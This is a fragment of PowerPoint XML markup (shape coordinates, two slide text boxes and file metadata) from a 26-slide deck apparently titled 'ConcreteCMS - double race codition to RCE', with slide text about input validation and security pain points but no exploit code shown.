                    <a:pt x="2058289" y="5562854"/>
                    <a:pt x="2112137" y="5566283"/>
                    <a:pt x="2165985" y="5566283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2225675" y="5566283"/>
                    <a:pt x="2285365" y="5562219"/>
                    <a:pt x="2345055" y="5548504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2380488" y="5540375"/>
                    <a:pt x="2416048" y="5537455"/>
                    <a:pt x="2451862" y="5537455"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2509393" y="5537455"/>
                    <a:pt x="2567305" y="5544948"/>
                    <a:pt x="2624709" y="5550155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2746121" y="5561204"/>
                    <a:pt x="2867406" y="5567935"/>
                    <a:pt x="2988691" y="5567935"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3096641" y="5567935"/>
                    <a:pt x="3204718" y="5562600"/>
                    <a:pt x="3312795" y="5550155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3384550" y="5542535"/>
                    <a:pt x="3456686" y="5538725"/>
                    <a:pt x="3528822" y="5538725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3624580" y="5538725"/>
                    <a:pt x="3720338" y="5545456"/>
                    <a:pt x="3815207" y="5559045"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3874516" y="5566792"/>
                    <a:pt x="3933571" y="5570221"/>
                    <a:pt x="3992372" y="5570221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4106164" y="5570221"/>
                    <a:pt x="4219194" y="5557394"/>
                    <a:pt x="4332351" y="5538090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4358513" y="5533645"/>
                    <a:pt x="4385437" y="5528057"/>
                    <a:pt x="4412234" y="5528057"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4438269" y="5528057"/>
                    <a:pt x="4463923" y="5533264"/>
                    <a:pt x="4488561" y="5549901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4492244" y="5551552"/>
                    <a:pt x="4496181" y="5552314"/>
                    <a:pt x="4500118" y="5552314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4501642" y="5552314"/>
                    <a:pt x="4503166" y="5552187"/>
                    <a:pt x="4504690" y="5551933"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4527931" y="5551679"/>
                    <a:pt x="4551299" y="5551425"/>
                    <a:pt x="4574540" y="5551425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4711319" y="5551425"/>
                    <a:pt x="4848098" y="5555997"/>
                    <a:pt x="4984750" y="5555997"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5025390" y="5555997"/>
                    <a:pt x="5066157" y="5555616"/>
                    <a:pt x="5106797" y="5554473"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5116830" y="5554219"/>
                    <a:pt x="5126863" y="5554092"/>
                    <a:pt x="5136896" y="5554092"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5243703" y="5554092"/>
                    <a:pt x="5350129" y="5567300"/>
                    <a:pt x="5456555" y="5575428"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5560314" y="5583301"/>
                    <a:pt x="5663692" y="5587874"/>
                    <a:pt x="5766943" y="5587874"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5946267" y="5587874"/>
                    <a:pt x="6124956" y="5574031"/>
                    <a:pt x="6303264" y="5539995"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6390132" y="5523104"/>
                    <a:pt x="6478143" y="5515738"/>
                    <a:pt x="6566281" y="5514722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6573648" y="5514595"/>
                    <a:pt x="6580887" y="5514595"/>
                    <a:pt x="6588252" y="5514595"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6669024" y="5514595"/>
                    <a:pt x="6749923" y="5519675"/>
                    <a:pt x="6830314" y="5527041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7152894" y="5557394"/>
                    <a:pt x="7476363" y="5551425"/>
                    <a:pt x="7799578" y="5557394"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8013954" y="5560823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8013954" y="0"/>
                  </a:ln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15" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671040" y="4489200"/>
            <a:ext cx="11049120" cy="81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6412"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4550" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS) Bold"/>
                <a:ea typeface="Calibri (MS) Bold"/>
              </a:rPr>
              <a:t>Oh, no, rejected! They do validation!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="45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TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4674600" y="6412680"/>
            <a:ext cx="2103120" cy="21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1678"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="42C9C8"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Fixing Security pain points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971</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>155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26</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="47" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri (MS)</vt:lpstr>
      <vt:lpstr>Calibri (MS) Bold</vt:lpstr>
      <vt:lpstr>IBM Plex Sans Condensed</vt:lpstr>
      <vt:lpstr>Kanit Medium</vt:lpstr>
      <vt:lpstr>PT Sans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ConcreteCMS - double race codition to RCE.pdf</dc:title>
  <dc:subject/>
  <dc:creator/>
  <dc:description/>
  <cp:lastModifiedBy>Adrian Tiron</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-18T11:44:15Z</dcterms:modified>
  <dc:identifier>DAGiEYqtoYY</dc:identifier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0x010100176953CFE2738E49BB704F04CA7530A7</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="PresentationFormat">
    <vt:lpwstr>Widescreen</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Slides">
    <vt:i4>26</vt:i4>
  </property>
</Properties>
</file>